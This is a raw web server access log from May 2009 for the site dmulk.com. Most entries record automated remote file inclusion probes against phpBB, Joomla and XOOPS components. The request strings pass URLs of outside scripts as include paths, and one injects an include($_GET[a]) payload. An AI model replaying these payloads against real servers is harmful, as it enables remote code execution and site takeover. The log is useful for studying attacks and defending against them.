91.121.210.42 - - [22/May/2009:09:54:56 -0700] "GET /logs/access_090130.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:54:56 -0700] "GET /logs/access_090130.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:55:00 -0700] "GET /logs/access_090124.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:55:01 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 7987 "-" "Mozilla/5.0" "www.dmulk.com"
195.13.227.99 - - [22/May/2009:09:55:17 -0700] "GET /logs/access_071229.log//login.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.128.40 - - [22/May/2009:09:55:17 -0700] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [22/May/2009:09:55:18 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:55:38 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:55:38 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:55:38 -0700] "GET /logs/access_080227.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:55:38 -0700] "GET /logs/access_080227.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:55:38 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:55:38 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:55:46 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:55:46 -0700] "GET /logs/access_080227.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:55:46 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:55:47 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:55:47 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:55:47 -0700] "GET /logs/access_080227.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:55:53 -0700] "GET /logs/access_080403.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:55:53 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:55:53 -0700] "GET /logs/access_080615.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:55:53 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:55:58 -0700] "GET /logs/access_080321.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:56:00 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:56:00 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:56:00 -0700] "GET /logs/access_080615.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:56:02 -0700] "GET /logs/access_080321.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [22/May/2009:09:56:12 -0700] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.20.116.193 - - [22/May/2009:09:56:15 -0700] "GET /logs/access_080403.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://expolady.com.ua//assets/site/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
76.220.28.235 - - [22/May/2009:09:56:17 -0700] "GET /logs/access_090124.log//errors.php?error=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:56:18 -0700] "GET /logs/access_080227.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:56:18 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:56:19 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:56:19 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:56:19 -0700] "GET /logs/access_080227.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:56:19 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:56:42 -0700] "GET /logs/access_080620.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:56:43 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:56:44 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:09:57:02 -0700] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:09:57:03 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:09:57:04 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:57:06 -0700] "GET /logs/access_090124.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [22/May/2009:09:57:12 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [22/May/2009:09:57:33 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:57:35 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:57:35 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:57:36 -0700] "GET /logs/access_080629.log/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:09:57:37 -0700] "GET /logs/access_081122.log//login.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:09:57:38 -0700] "GET /login.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:57:39 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:57:39 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:57:39 -0700] "GET /logs/access_080629.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:09:57:39 -0700] "GET /logs//login.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:57:43 -0700] "GET /logs/access_080701.log/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:57:47 -0700] "GET /logs/access_080701.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:57:47 -0700] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:57:51 -0700] "GET /phphtml.php?htmlclass_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:57:52 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.78.119.54 - - [22/May/2009:09:57:52 -0700] "GET /logs/access_080322.log/modules.php?name=http://www.raindrip.com/cms/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.78.119.54 - - [22/May/2009:09:57:53 -0700] "GET /modules.php?name=http://www.raindrip.com/cms/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.78.119.54 - - [22/May/2009:09:57:54 -0700] "GET /logs/modules.php?name=http://www.raindrip.com/cms/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.62.35 - - [22/May/2009:09:58:00 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://jamur.do.am/id.txt? HTTP/1.1" 500 292 "-" "libwww-perl/5.803" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:09:58:06 -0700] "GET /login.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:58:23 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:09:58:23 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:09:58:23 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:09:58:23 -0700] "GET /logs/access_080227.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:09:58:23 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:09:58:23 -0700] "GET /logs/access_080227.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:09:58:26 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:09:58:30 -0700] "GET /logs/access_080227.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:09:58:30 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:09:58:33 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.151 - - [22/May/2009:09:58:50 -0700] "GET /bikes/occcb/eBayISAPI.dll_files/iconGryBul_16x16.gif HTTP/1.1" 200 61 "-" "Googlebot-Image/1.0" "dmulk.com"
65.23.158.226 - - [22/May/2009:09:58:51 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:58:51 -0700] "GET /logs/access_080629.log/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [22/May/2009:09:58:51 -0700] "GET /logs/access_071214.log//?_zb_path=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:58:52 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [22/May/2009:09:58:52 -0700] "GET /logs//?_zb_path=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt? HTTP/1.1" 200 100625 "-" "Mozilla/5.0" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:58:57 -0700] "GET /logs/access_081001.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.92.68.111 - - [22/May/2009:09:58:59 -0700] "GET /authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://www.fhbgc.org/Calendar/tools/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.92.68.111 - - [22/May/2009:09:58:59 -0700] "GET /logs//authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://www.fhbgc.org/Calendar/tools/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.92.68.111 - - [22/May/2009:09:59:00 -0700] "GET /logs/access_080929.log//authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://www.fhbgc.org/Calendar/tools/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.92.68.111 - - [22/May/2009:09:59:01 -0700] "GET /logs/access_080828.log//authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://www.fhbgc.org/Calendar/tools/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:59:01 -0700] "GET /logs/access_080701.log/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.94.155.59 - - [22/May/2009:09:59:03 -0700] "GET /logs/access_080403.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [22/May/2009:09:59:06 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.38.243.71 - - [22/May/2009:09:59:07 -0700] "GET /logs//?_zb_path=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt? HTTP/1.1" 200 100625 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [22/May/2009:09:59:25 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
196.25.27.90 - - [22/May/2009:09:59:28 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.25.27.90 - - [22/May/2009:09:59:28 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.25.27.90 - - [22/May/2009:09:59:31 -0700] "GET /logs/access_080227.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:09:59:36 -0700] "GET /logs/access_071229.log//login.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.243.71 - - [22/May/2009:09:59:53 -0700] "GET /?_zb_path=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt? HTTP/1.1" 200 42092 "-" "Mozilla/5.0" "www.dmulk.com"
69.90.72.88 - - [22/May/2009:10:00:12 -0700] "GET /logs/access_080612.log/index.php?principal=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [22/May/2009:10:00:14 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
69.90.72.88 - - [22/May/2009:10:00:18 -0700] "GET /logs/index.php?principal=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [22/May/2009:10:00:28 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
121.78.119.54 - - [22/May/2009:10:00:35 -0700] "GET /logs/access_081122.log/modules.php?name=http://www.raindrip.com/cms/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.77.136.123 - - [22/May/2009:10:00:36 -0700] "HEAD /bikes/occcb/eBayISAPI.dll.htm HTTP/1.0" 200 0 "-" "Mozilla/3.0 [en] (compatible; Win98; U)" "www.dmulk.com"
64.157.4.43 - - [22/May/2009:10:00:49 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:01:09 -0700] "GET /logs/access_080224.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:01:09 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:01:09 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:01:09 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:01:09 -0700] "GET /logs/access_080224.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:01:10 -0700] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:01:10 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:01:10 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:01:10 -0700] "GET /logs/access_080709.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:01:11 -0700] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
